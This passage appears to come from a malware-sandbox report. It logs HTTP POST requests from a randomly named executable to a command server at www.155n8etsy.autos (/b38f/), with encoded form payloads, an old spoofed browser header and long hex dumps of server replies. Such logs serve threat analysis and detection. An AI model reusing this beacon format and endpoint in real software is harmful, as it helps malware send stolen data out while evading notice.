                                                                                                Nov 11, 2024 17:03:48.564156055 CET246INData Raw: 43 5a 45 72 71 65 69 72 5a 4f 45 69 46 35 37 66 6c 7a 41 6b 42 4b 46 6d 53 50 32 6a 71 35 37 4d 6a 34 4d 67 44 57 51 52 62 34 43 38 36 79 57 4e 6f 6c 37 7a 30 53 49 7a 47 57 6d 4d 39 4d 43 31 6d 61 5a 6c 50 6a 46 5a 30 6d 4e 53 35 44 43 6d 37 37
                                                                                                Data Ascii: CZErqeirZOEiF57flzAkBKFmSP2jq57Mj4MgDWQRb4C86yWNol7z0SIzGWmM9MC1maZlPjFZ0mNS5DCm7776Hxik4DiCgGQBc8HCZieboMtxYaag15ij4WwBYa285mQCcDTsJOeAMDK1nJ31sF8aHXuRBD5lGKdTEeh+V6bE71eI5LPpOULoCz67ByAJwr6uSyI+MrQt7VeunBMaskNt0QOc3bIomFbc8TgMmY3nG4nfv+a2i8o
                                                                                                Nov 11, 2024 17:03:48.564245939 CET1289INData Raw: 41 42 61 68 6b 48 67 32 6a 73 50 5a 6d 48 6a 54 50 58 42 6f 6b 2b 39 77 43 77 44 62 61 57 79 37 49 6d 4f 6b 53 46 37 48 73 68 6c 6a 4a 54 48 34 6c 66 62 52 63 4a 41 6b 32 2b 6b 38 52 4f 56 74 6e 76 66 67 4d 42 36 48 35 58 70 73 37 76 36 70 4f 43
                                                                                                Data Ascii: ABahkHg2jsPZmHjTPXBok+9wCwDbaWy7ImOkSF7HshljJTH4lfbRcJAk2+k8ROVtnvfgMB6H5Xps7v6pOC7pcnqGCqAgO+0kQ47BeoRlR8brAHwHoFH+4wyooQaVTjebo220+2njFZ3+9eqljVd0KgdgJh7VsQIAcBx2XLvDSoIeUcyoCGAVjW1bqDMhec0wwfbdmU+wtw4QJTt2KEWjwjzLLi7E47Bcj01HJPB0LzU9k2A/yj0
                                                                                                Nov 11, 2024 17:03:48.564265966 CET1289INData Raw: 2f 44 67 41 6a 77 4f 79 35 55 51 4d 51 43 32 55 6d 42 4d 5a 74 47 55 43 35 56 51 57 42 6d 76 67 6c 67 42 59 4e 6d 52 38 65 30 41 4c 49 47 4e 44 7a 34 52 55 6e 76 57 61 7a 32 47 52 72 51 65 44 49 34 61 32 47 2b 61 6e 51 4b 4a 2f 31 71 48 4a 55 44
                                                                                                Data Ascii: /DgAjwOy5UQMQC2UmBMZtGUC5VQWBmvglgBYNmR8e0ALIGNDz4RUnvWaz2GRrQeDI4a2G+anQKJ/1qHJUDIAnDEnh0ByMo1z76ZNr8i0jP7w+ZoiGbQ2HZvA4BO4BUkQLMyYJQDhjQbZgwEm5IOHhzD47BcCWNW2HBYREhnBBPUgv08wsS0K7+e/7QZgJ9hJ1SihJfmE6r2AoNGNUVZR2k2i9pp90v5T+W9kMkAMB+21RIAAAwI
                                                                                                Nov 11, 2024 17:03:48.564280987 CET1289INData Raw: 50 44 73 63 34 31 42 31 6a 75 5a 71 56 31 58 50 58 69 73 4b 54 55 6e 50 52 66 63 68 67 37 50 75 76 34 44 75 38 71 50 67 48 56 76 41 58 31 2f 44 79 7a 63 67 42 65 42 6a 41 58 77 48 34 41 32 77 31 47 2f 54 53 44 55 64 38 32 7a 2b 50 2b 31 79 6b 79
                                                                                                Data Ascii: PDsc41B1juZqV1XPXisKTUnPRfchg7Puv4Du8qPgHVvAX1/DyzcgBeBjAXwH4A2w1G/TSDUd82z+P+1ykyhocA3M7M7OJTp2oCGCs66NBsPd+gdEktAysy/CFQp5lIlbvlQqe2t9B+FGADWNR/z1k9jCUcCjTZTaL4+vqzU8MxI24gigrt8NGGZUpiIlHhOYUckAHGnYCf1naFZ4YkNt34n54SGox6jcGob2Yw6scC2AhZMPJry
                                                                                                Nov 11, 2024 17:03:48.564295053 CET1289INData Raw: 38 43 41 41 71 6a 6e 2b 74 6c 4d 35 76 72 79 46 2b 38 37 4d 61 53 57 72 72 70 39 4b 4d 4a 39 73 42 66 76 34 41 33 67 62 77 43 34 42 59 67 31 48 2f 69 63 47 6f 2f 39 66 6d 75 5a 45 73 54 57 4c 7a 43 5a 39 6d 4d 72 64 6e 50 35 36 2f 44 71 76 34 71
                                                                                                Data Ascii: 8CAAqjn+tlM5vryF+87MaSWrrp9KMJ9sBfv4A3gbwC4BYg1H/icGo/9fmuZEsTWLzCZ9mMrdnP56/Dqv4qAQyY7fAWFq22VKnkNZzmlauOpiGtewJnnvexi1uAYhwrOf/KaIAHLdnlGWyDv3pzJQuuJPSEwwPT5t9vZq1qdQ0niP6UxqGAeA4uhxapflB+OnsTQeBf3H6k8Go9zUY9R8gbykHwCDYcFYA4K9VzetQs1yLtxZsUq
                                                                                                Nov 11, 2024 17:03:48.564405918 CET1289INData Raw: 39 56 38 61 6a 48 70 62 49 34 79 2f 6c 53 34 31 77 78 6b 41 6d 33 6c 6f 41 47 43 52 78 4a 61 52 47 61 74 4b 77 47 78 35 65 4c 64 51 46 43 2b 66 75 58 2b 33 4f 73 73 6e 42 4b 6a 6d 2b 5a 68 75 4e 53 65 75 51 70 32 4b 63 32 42 62 30 66 52 33 46 68
                                                                                                Data Ascii: 9V8ajHpbI4y/lS41wxkAm3loAGCRxJaRGatKwGx5eLdQFC+fuX+3OssnBKjm+ZhuNSeuQp2Kc2Bb0fR3FhXrKW2fR7+QyNOQi3XYJTXX8vn5lHn1kZDaB7L8DgcVH9K8YoX9RCQCgIrn4unF93Oh4pWE5ZxjUbH/2A0kg1FfwhCrnwDCfsjrnbbzW/MgQlaQl3b05TupXQcv2VIJL9c7B7XwaAAuhy9wIHM+vLj1kOOxAOAqGPu
                                                                                                Nov 11, 2024 17:03:48.564409018 CET1289INData Raw: 41 56 34 73 6b 70 53 64 51 41 49 30 47 6b 6d 55 39 66 65 41 6e 54 71 79 58 61 61 69 73 4d 39 4b 69 78 45 77 67 4f 41 2f 6f 30 2b 76 51 42 41 38 64 72 4a 6a 5a 53 73 52 5a 66 33 7a 43 42 6b 35 67 79 42 56 74 55 79 4c 64 64 36 55 38 50 7a 4f 30 61
                                                                                                Data Ascii: AV4skpSdQAI0GkmU9feAnTqyXaaisM9KixEwgOA/o0+vQBA8drJjZSsRZf3zCBk5gyBVtUyLdd6U8PzO0at2c0gcB0UNHH6n5AOZTDqtQajfgRkJZW3ATiiQZUYoNP0G9dmZtcOCze9iK7PXYDAv2TDPgU66oqD5ufAYVGBcxIUriXawyUOq1e98LOQg8seIt2Uvdh4+fum5+9f6ww7tdnUnDA+pEGHfV8c2578tH/JFiqen+dg
                                                                                                Nov 11, 2024 17:03:48.902060986 CET1289INData Raw: 30 31 5a 77 75 4b 57 4c 65 78 53 6c 4b 48 6e 30 38 76 58 48 52 36 77 49 35 50 77 62 42 55 61 59 4d 43 78 33 30 51 4d 72 37 44 79 53 39 4f 78 41 62 34 61 37 33 61 36 51 54 56 61 43 6a 63 38 63 6c 44 44 57 41 73 67 4b 30 47 6f 37 36 6d 41 39 65 35
                                                                                                Data Ascii: 01ZwuKWLexSlKHn08vXHR6wI5PwbBUaYMCx30QMr7DyS9OxAb4a73a6QTVaCjc8clDDWAsgK0Go76mA9e5gh2AXcVJ/o/k+53xzek15Ut4n2hRpcQPjef+lg5v7XQF7V+EA9OcJ51+jSIvADhYyCkRchhKDIAoMPY8GHsawGtE+AWwcJCkJgB8FNxmi+t6bB+DUV/aYNR/C2AhlBUheYBVp+Ln9Aup3Th86uoEGh22J6/qktKR2


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                46192.168.11.204979343.156.106.109807940C:\Program Files (x86)\tMdXliauqepYkyZtkrFMcEPFMfPFeFIyXfsJKWlmRQRpaPKIhyaHQmZZJ\ptzMmYcrKro.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Nov 11, 2024 17:03:51.048891068 CET785OUTPOST /b38f/ HTTP/1.1
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Accept-Language: en-us
                                                                                                Host: www.155n8etsy.autos
                                                                                                Origin: http://www.155n8etsy.autos
                                                                                                Cache-Control: no-cache
                                                                                                Content-Length: 221
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Connection: close
                                                                                                Referer: http://www.155n8etsy.autos/b38f/
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; GWX:QUALIFIED; MASMJS)
                                                                                                Data Raw: 49 42 51 50 3d 57 47 74 48 32 57 6b 6e 48 6f 4b 73 30 74 2f 41 59 6f 64 69 5a 77 5a 68 38 61 31 36 4c 6b 71 76 49 46 6c 44 48 74 54 67 5a 62 39 41 44 30 75 6e 65 57 58 57 4a 45 58 45 64 2b 59 7a 52 6d 54 37 67 53 59 6a 61 41 5a 76 49 45 6e 74 5a 6b 32 76 49 62 54 42 6d 48 54 36 6b 78 30 4b 57 55 74 71 66 6a 54 37 4c 57 54 45 6d 51 2b 6d 35 5a 6a 39 37 63 45 43 79 6b 72 54 69 70 47 47 4d 59 4e 50 6a 2b 42 53 65 55 68 79 5a 64 61 61 55 54 33 2f 72 34 36 73 62 4f 41 76 41 70 6f 77 4a 68 77 44 73 55 44 6c 31 5a 45 47 70 59 43 7a 58 47 36 51 48 54 43 61 43 68 45 47 34 79 42 6b 57 30 75 73 67 4f 42 55 78 75 65 49 5a 44 6a 2f 44 30 4f 36 55 44 61 7a 7a 6b 51 3d
                                                                                                Data Ascii: IBQP=WGtH2WknHoKs0t/AYodiZwZh8a16LkqvIFlDHtTgZb9AD0uneWXWJEXEd+YzRmT7gSYjaAZvIEntZk2vIbTBmHT6kx0KWUtqfjT7LWTEmQ+m5Zj97cECykrTipGGMYNPj+BSeUhyZdaaUT3/r46sbOAvApowJhwDsUDl1ZEGpYCzXG6QHTCaChEG4yBkW0usgOBUxueIZDj/D0O6UDazzkQ=
                                                                                                Nov 11, 2024 17:03:51.457091093 CET1289INHTTP/1.1 404 Not Found
                                                                                                Server: Tengine
                                                                                                Date: Mon, 11 Nov 2024 16:03:51 GMT
                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                Content-Length: 58288
                                                                                                Connection: close
                                                                                                Vary: Accept-Encoding
                                                                                                ETag: "6729ca88-e3b0"
                                                                                                Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 2a 20 7b 0a 09 09 09 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 09 09 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 09 09 09 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 09 09 09 7d 0a 09 09 09 68 74 6d 6c 20 7b 0a 09 09 09 09 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 09 09 09 7d 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 09 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 09 09 09 7d 0a 09 09 09 2e 63 6f [TRUNCATED]
                                                                                                Data Ascii: <!doctype html><html><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1.0" /><title>404 Not Found</title><style>* {margin: 0;padding: 0;box-sizing: border-box;}html {height: 100%;}body {height: 100%;font-size: 14px;}.container {display: flex;flex-direction: column;align-items: center;height: 100%;padding-top: 12%;}.logo img { display: block; width: 100px;}.logo img + img { margin-top: 12px;}.title {margin-top: 24px;font-size: 110px;color: #333;letter-spacing: 10px;}.desc {font-size: 16px;color: #777;text-align: center;line-height: 24px;}.footer {/* position: absolute;left: 0;bottom: 32px;width: 100%; */margin-top: 24px;text-align: center;font-size: 12px;}.footer .btlink {color: #20a53a;text-decoration: no [TRUNCATED]
                                                                                                Nov 11, 2024 17:03:51.457124949 CET1289INData Raw: 76 20 63 6c 61 73 73 3d 22 6c 6f 67 6f 22 3e 0a 09 09 09 09 3c 69 6d 67 20 73 72 63 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 70 6e 67 3b 62 61 73 65 36 34 2c 69 56 42 4f 52 77 30 4b 47 67 6f 41 41 41 41 4e 53 55 68 45 55 67 41 41 41 53 77 41 41 41
                                                                                                Data Ascii: v class="logo"><img src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAASwAAAEDCAYAAACPhzmWAAAABHNCSVQICAgIfAhkiAAAAAlwSFlzAAAt+wAALfsB/IdK5wAAABx0RVh0U29mdHdhcmUAQWRvYmUgRmlyZXdvcmtzIENTNui8sowAACAASURBVHic7J13eBRVF8bfMzPb0hNK6CAgVUCC9JJ
                                                                                                Nov 11, 2024 17:03:51.457142115 CET1289INData Raw: 65 2b 62 6a 71 39 61 44 35 2f 59 33 79 4c 62 59 6f 6c 6b 41 49 68 77 36 59 33 6d 32 75 2f 67 7a 77 30 46 45 4a 6a 76 47 67 4b 6f 78 32 50 72 39 68 4f 49 78 32 47 35 45 51 4a 65 4c 33 6a 4d 49 6f 6c 64 44 39 33 34 70 74 50 39 6e 4b 79 52 41 54 35
                                                                                                Data Ascii: e+bjq9aD5/Y3yLbYolkAIhw6Y3m2u/gzw0FEJjvGgKox2Pr9hOIx2G5EQJeL3jMIoldD934ptP9nKyRAT5c2IEY0+SVW00j4Uf7QDZHUVo3dvUJh4qcxjGwBtcz06NX9h7x+YauPaf/kXy/pVpFg4fMz6wFHuGFXPIijWnr58bOPtF4HJab2HRuXn0AIYWdu5+TYbgxeN+x7dvTTSjHHwCPiXg4MLEwUl3eSQ8PyLRzXsgVrR/u
                                                                                                Nov 11, 2024 17:03:51.457258940 CET1289INData Raw: 43 5a 45 72 71 65 69 72 5a 4f 45 69 46 35 37 66 6c 7a 41 6b 42 4b 46 6d 53 50 32 6a 71 35 37 4d 6a 34 4d 67 44 57 51 52 62 34 43 38 36 79 57 4e 6f 6c 37 7a 30 53 49 7a 47 57 6d 4d 39 4d 43 31 6d 61 5a 6c 50 6a 46 5a 30 6d 4e 53 35 44 43 6d 37 37
                                                                                                Data Ascii: CZErqeirZOEiF57flzAkBKFmSP2jq57Mj4MgDWQRb4C86yWNol7z0SIzGWmM9MC1maZlPjFZ0mNS5DCm7776Hxik4DiCgGQBc8HCZieboMtxYaag15ij4WwBYa285mQCcDTsJOeAMDK1nJ31sF8aHXuRBD5lGKdTEeh+V6bE71eI5LPpOULoCz67ByAJwr6uSyI+MrQt7VeunBMaskNt0QOc3bIomFbc8TgMmY3nG4nfv+a2i8o
                                                                                                Nov 11, 2024 17:03:51.457278967 CET1289INData Raw: 79 49 4e 51 42 68 35 62 67 30 41 31 67 5a 52 58 30 34 52 2b 4a 78 4a 69 58 52 52 4a 37 57 43 53 70 6a 53 68 4a 7a 30 69 4d 56 57 53 4d 2b 54 48 49 7a 69 72 50 70 74 72 4b 34 34 65 58 73 43 39 32 7a 6f 4d 6b 72 62 58 52 58 45 30 41 63 32 6a 73 58
                                                                                                Data Ascii: yINQBh5bg0A1gZRX04R+JxJiXRRJ7WCSpjShJz0iMVWSM+THIzirPptrK44eXsC92zoMkrbXRXE0Ac2jsXy8tA7PrsLKtYkl4a7JhOwSCA/MMClyJx2G5Fg52XtNMc24a1ColeYTZD/6x7Mj41wCMt2XspeK/aVJ+5AH4eX+poG0LgD8U2P0jIaJbAK7as8sVxZ5rzkzpgxlxvcCYrXWp3gAb+uAPiTG70+Uci7U05FxCWzplHP
                                                                                                Nov 11, 2024 17:03:51.457293987 CET1289INData Raw: 49 51 41 78 41 48 59 43 75 44 69 70 37 61 77 6e 35 30 32 6a 6f 71 63 49 44 50 41 57 69 42 72 69 64 73 49 57 42 50 68 2b 55 57 51 62 6f 6e 53 78 5a 70 43 50 57 6d 49 32 6c 52 38 79 33 36 72 66 5a 43 67 4e 62 39 6b 62 4f 6b 30 4c 4f 37 33 36 46 52
                                                                                                Data Ascii: IQAxAHYCuDip7awn502joqcIDPAWiBridsIWBPh+UWQbonSxZpCPWmI2lR8y36rfZCgNb9kbOk0LO736FRDfZjPi/nPTk49bzZIADFt2ZLwXgIG2bBkQvPL4yhVswb7uNDqsKziuVyFmhEDv50RJiid5DarQB0GNIN91yLJUhZ9Nkb4MsCenYrfBqNdC1iJrCaAjgKYAyjMGFc8Tq+irG77kwPnf956/PQle6gtIwT2IzAv2K2/
                                                                                                Nov 11, 2024 17:03:51.457305908 CET475INData Raw: 65 50 52 47 4b 74 4d 2b 4f 72 53 37 75 64 59 43 6c 58 47 31 41 6a 63 37 36 2f 57 47 50 38 62 6e 74 75 2b 42 62 62 66 76 2b 2f 2f 43 2b 45 4c 6a 74 49 76 4a 44 4a 75 32 5a 48 78 6e 77 4d 59 59 38 74 4f 6b 6c 6a 49 6a 36 63 6e 7a 32 46 66 37 42 78
                                                                                                Data Ascii: ePRGKtM+OrS7udYClXG1Ajc76/WGP8bntu+Bbbfv+//C+ELjtIvJDJu2ZHxnwMYY8tOkljIj6cnz2Ff7BxGY9p2BNFfcj1EarSq2aKMrzb+kski4mHNLWuwj3Y3Qqo+DyLb3x+CXR35fzoGo54D0BpATwDdAJQpypYB4Ij+eLqk37C3Jq2Mx1PBU1DK78G64jlo+FdxzzoNPIUBaO9Mf5yKw+pVL/wCgO9yREvn12o0mXb8J+Pr
                                                                                                Nov 11, 2024 17:03:51.457321882 CET1289INData Raw: 7a 65 74 51 73 31 79 4c 74 78 5a 73 55 71 46 47 2b 62 31 51 71 32 52 6e 52 62 67 4a 4c 59 58 68 75 76 6c 74 38 42 51 4f 77 41 69 35 70 4a 72 44 46 43 66 53 66 51 6b 42 35 6b 79 4c 61 57 6a 4d 2f 47 39 37 48 39 73 65 32 31 46 69 30 6a 57 35 66 31
                                                                                                Data Ascii: zetQs1yLtxZsUqFG+b1Qq2RnRbgJLYXhuvlt8BQOwAi5pJrDFCfSfQkB5kyLaWjM/G97H9se21Fi0jW5f1TCR635atXVE6smxq5cXtY7oKGK45VU1W0C4DMA8Qaj/nODUV+rGP37u7gF28GEsEpibWBHJeSaCsqaAMDdumWD060Se2Sq7K9RzXg6oO8dBQvtkSwq9j81HXGEfiGRmQxstBLbTJN5GVsRKSI9+6OHTghcYyAslee
                                                                                                Nov 11, 2024 17:03:51.457335949 CET1289INData Raw: 4c 6a 31 6b 4f 4f 78 41 4f 41 71 47 50 75 78 4f 50 30 75 6c 73 50 71 55 65 38 6a 45 34 42 6c 44 2f 35 6d 59 4e 56 2b 2b 6d 50 2f 68 6d 75 44 44 79 77 7a 69 39 62 50 43 74 6f 54 34 4f 32 76 31 73 32 39 6d 70 6d 79 59 66 36 4a 75 43 4f 39 79 34 66
                                                                                                Data Ascii: Lj1kOOxAOAqGPuxOP0ulsPqUe8jE4BlD/5mYNV++mP/hmuDDywzi9bPCtoT4O2v1s29mpmyYf6JuCO9y4fU5on7zQH9DV/I29Z7DUb9BINRb3MR8G/kBGzLzIAB5dVmVg33kn/Jd9iM5Izr11Mz86/dWRpWLPExhTd/GQLfzUaTJshVZDw8zFwUIjddCMKeKwmr2LLZx5GVK69/qfjnPtt0KIUDLgBASS/1byinrQgim5Wh87BZ
                                                                                                Nov 11, 2024 17:03:51.488423109 CET1289INData Raw: 37 38 74 48 2f 4a 46 69 71 65 6e 2b 64 67 4e 33 53 51 30 33 35 69 44 55 61 39 72 62 57 65 78 38 55 65 46 41 78 5a 4b 41 41 44 31 46 65 53 6a 33 5a 43 56 73 34 4f 79 4f 4c 4b 64 7a 4b 74 50 77 5a 62 52 61 6d 79 77 4e 47 4a 31 32 70 50 57 49 49 36
                                                                                                Data Ascii: 78tH/JFiqen+dgN3SQ035iDUa9rbWex8UeFAxZKAAD1FeSj3ZCVs4OyOLKdzKtPwZbRamywNGJ12pPWII6FeeBiq51mMfX7GuPv7LDCtgJ6P0LVmLP1btrjjd5+jukZMb9kZJ+tYyf17wriekh4Dgl5ef/9qm5wahvDmAz5HVNxWu9DIBG4FdVLeHXYtiMtXtodNh2aFX/A8FWHU0TeOqJC2YTBPoRj5ZVO4pC/IMzuE4imbHCp
                                                                                                Nov 11, 2024 17:03:51.816201925 CET1289INData Raw: 45 47 68 32 32 4a 36 2f 71 6b 74 4b 52 32 52 62 32 61 57 77 66 2b 69 42 30 4e 41 6a 76 32 37 44 62 7a 42 62 46 75 61 7a 55 6d 55 73 64 6c 69 53 4a 68 32 45 6a 4c 63 55 69 57 54 39 59 64 32 62 68 34 50 69 2b 30 51 4d 59 32 48 4b 6c 37 58 4a 45 74
                                                                                                Data Ascii: EGh22J6/qktKR2Rb2aWwf+iB0NAjv27DbzBbFuazUmUsdliSJh2EjLcUiWT9Yd2bh4Pi+0QMY2HKl7XJEtcp5+UcvP7N31rQj21ZU9yvVmEA7HOxea8jqpz0cvK44XIOCrHSzVQy7mrmGPz9uy9XS2sF3wHEGkKIP3z4WFfufVrR0A8a831chj4DlitoMVZGLzgB+AJEPiMIJWMsTt+Hw7R+8wVgrBW0fw2MMGDUY9Y0hr1W968


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                47192.168.11.204979443.156.106.109807940C:\Program Files (x86)\tMdXliauqepYkyZtkrFMcEPFMfPFeFIyXfsJKWlmRQRpaPKIhyaHQmZZJ\ptzMmYcrKro.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Nov 11, 2024 17:03:53.917448997 CET6445OUTPOST /b38f/ HTTP/1.1
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Accept-Language: en-us
                                                                                                Host: www.155n8etsy.autos
                                                                                                Origin: http://www.155n8etsy.autos
                                                                                                Cache-Control: no-cache
                                                                                                Content-Length: 7369
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Connection: close
                                                                                                Referer: http://www.155n8etsy.autos/b38f/
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; GWX:QUALIFIED; MASMJS)
                                                                                                Data Raw: 49 42 51 50 3d 57 47 74 48 32 57 6b 6e 48 6f 4b 73 30 74 2f 41 59 6f 64 69 5a 77 5a 68 38 61 31 36 4c 6b 71 76 49 46 6c 44 48 74 54 67 5a 61 46 41 44 48 57 6e 63 31 2f 57 4f 45 58 45 65 2b 59 2b 52 6d 54 6d 67 53 51 6e 61 42 6c 56 49 48 66 74 59 45 71 76 42 4a 72 42 73 48 54 36 6d 78 30 4c 4c 45 74 61 66 6a 44 33 4c 57 44 45 6d 51 2b 6d 35 62 37 39 79 75 67 43 77 6b 72 63 7a 70 47 61 62 6f 4d 67 6a 2b 6f 76 65 55 6c 49 5a 4e 36 61 55 33 62 2f 75 4f 75 73 48 65 41 74 44 70 6f 6f 4a 68 30 63 73 51 69 4c 31 59 77 38 70 62 69 7a 55 79 76 70 43 58 4b 2b 5a 68 51 34 6e 6a 78 4c 42 55 33 39 6e 66 78 4b 78 2b 6d 79 56 45 7a 56 43 45 65 6e 46 52 75 31 77 52 76 4a 69 59 2f 58 6d 31 5a 49 42 56 63 72 44 6d 2b 56 4b 41 59 2f 4e 62 49 4f 32 41 64 2f 36 48 50 32 72 2b 6b 4f 42 4c 44 4e 55 6a 69 4b 6b 58 69 54 4d 4e 65 42 61 32 74 39 46 2b 4a 62 42 39 6c 4a 4b 35 63 58 50 32 78 37 76 4c 33 50 59 36 63 2f 34 73 54 53 6a 4d 75 6a 6c 72 2b 41 53 51 45 71 62 2f 39 46 32 49 4d 6e 7a 4e 33 48 4a 4d 5a 42 30 2f 79 49 37 [TRUNCATED]
                                                                                                Data Ascii: IBQP=WGtH2WknHoKs0t/AYodiZwZh8a16LkqvIFlDHtTgZaFADHWnc1/WOEXEe+Y+RmTmgSQnaBlVIHftYEqvBJrBsHT6mx0LLEtafjD3LWDEmQ+m5b79yugCwkrczpGaboMgj+oveUlIZN6aU3b/uOusHeAtDpooJh0csQiL1Yw8pbizUyvpCXK+ZhQ4njxLBU39nfxKx+myVEzVCEenFRu1wRvJiY/Xm1ZIBVcrDm+VKAY/NbIO2Ad/6HP2r+kOBLDNUjiKkXiTMNeBa2t9F+JbB9lJK5cXP2x7vL3PY6c/4sTSjMujlr+ASQEqb/9F2IMnzN3HJMZB0/yI7a0EWUQoKI2jyfa5patHKyhAJNNP1b8URwrB9oWF9myQ23tgjshCP2T30rXQ7Fh7oiWREnwp9O0ka7b/iGuH0zhM8+tsCwcOEh0Ipg2rSlPkGmX+M77+RGTJyvtcSr59nC0CtQ7W3V0a8VaDNMb/HOcjF9CW4PzMCLPaRix5/WUtp8bqQb+iqSgHCU06y/3LHcSFds0Kk97cjtFuc2EE0FfdWX4q2TsVZR6Z7tjebcfoF5KiAwfk8eegLJrqCtUj02/sKdfZN2OmRGsp0NG/HLLPTuHMKTFExAMNLRCjaspU3bkPIjaqBfV2IJNBO8LZV8Mgoj7mwxPUohKBte0ohKV3cAsTbQWHclx5qb174aDThl+L1ATmis4R7CndlpCIv52X97yQePp7G7sIdBXj2jhbBX7FhAZxRTkVHhGteNnwM/GLDES51nMIddBWKvyB6ysG/BaupRbeKBTdFac+nCHIFVrhtOTwhK1lF8SFKZfInOmxZCt4GeZgXG3UQA5euxYnBRyoXtG7FyEe+1dwod4USBc+/7WXXunGT+EeBmPqKANUsAGh3ZDHCWyeR+cw/uNxOguhi2BIQjeAhN3TNGE5fwJH6kaYvoPeRfIGriuyF07Y31pyobHJtZi+7k9WoR5QtVOnLkh2+e7yNThNkXrJnjdv6FQ2zau [TRUNCATED]
                                                                                                Nov 11, 2024 17:03:53.917474031 CET1289OUTData Raw: 68 37 35 45 78 53 57 73 46 69 4f 78 70 76 59 65 2f 44 4c 32 65 43 6f 48 4d 34 32 4d 7a 62 55 50 51 71 30 46 45 4b 54 77 6b 72 62 59 73 4a 4a 68 67 32 4b 32 6a 43 38 54 2f 2f 52 75 66 4d 68 56 62 45 45 77 6e 66 78 46 4a 75 4a 4a 4a 6c 41 79 37 38
                                                                                                Data Ascii: h75ExSWsFiOxpvYe/DL2eCoHM42MzbUPQq0FEKTwkrbYsJJhg2K2jC8T//RufMhVbEEwnfxFJuJJJlAy78NfGCIwVHkeFXkUfOpUrDnBQgo/ZdGzw9Shm1F43PXeAnd0xXH1eAO4tGltnTNcsvz2PVTHvhK0+Q2GFk57/NOKbp8UOFqcJ1bFdIbouwlQ1xLegAKHv/anrqOj4PyDWv34fPFzMwdnUs1CaisFVQBClenueOHKvTo
                                                                                                Nov 11, 2024 17:03:53.917547941 CET200OUTData Raw: 48 4b 75 74 6d 32 46 70 71 30 34 63 78 54 39 33 47 35 6d 35 70 4e 69 2f 72 4c 48 77 48 57 75 2b 50 5a 49 4a 35 34 63 42 64 4a 4c 49 5a 4c 71 5a 73 53 41 63 36 32 4e 6b 4e 39 34 6d 6e 62 53 56 49 30 7a 75 6c 4e 7a 51 4d 67 77 67 68 5a 67 79 36 34
                                                                                                Data Ascii: HKutm2Fpq04cxT93G5m5pNi/rLHwHWu+PZIJ54cBdJLIZLqZsSAc62NkN94mnbSVI0zulNzQMgwghZgy64n707pp8dAXxrXfxOC1ZaPpp16PVyxjUWraBHO6MfX3mFZn5RE2Iq7Lnnc9K/Yk/BCNG2UoOaiZeYEVg+bTckEl567MVN+xXISJI+6hkRoh0Jhsr/2S7Q==
                                                                                                Nov 11, 2024 17:03:54.974230051 CET1289OUTData Raw: 72 71 4f 6a 34 50 79 44 57 76 33 34 66 50 46 7a 4d 77 64 6e 55 73 31 43 61 69 73 46 56 51 42 43 6c 65 6e 75 65 4f 48 4b 76 54 6f 49 72 45 50 56 46 36 54 7a 42 78 36 49 42 78 72 4c 52 72 38 47 33 4e 36 45 70 50 43 52 55 4a 70 62 6b 39 33 43 42 56
                                                                                                Data Ascii: rqOj4PyDWv34fPFzMwdnUs1CaisFVQBClenueOHKvToIrEPVF6TzBx6IBxrLRr8G3N6EpPCRUJpbk93CBV9WXKIt0CgKmgoz0yDZTtyH/BqjtCKcUxq/WL89uLTvG2wrJXRsi5/0iorX2p9vMU5pMY59jasunaYjW9vFHislW2DqM69FP5FqlwkEZ2feY+VZ267PNwLc/uX4KUjiXoLhV2ho5bK8wweFR0ZyxzS33pTwgSpV1qp
                                                                                                Nov 11, 2024 17:03:55.312825918 CET2578OUTData Raw: 58 39 37 79 51 65 50 70 37 47 37 73 49 64 42 58 6a 32 6a 68 62 42 58 37 46 68 41 5a 78 52 54 6b 56 48 68 47 74 65 4e 6e 77 4d 2f 47 4c 44 45 53 35 31 6e 4d 49 64 64 42 57 4b 76 79 42 36 79 73 47 2f 42 61 75 70 52 62 65 4b 42 54 64 46 61 63 2b 6e
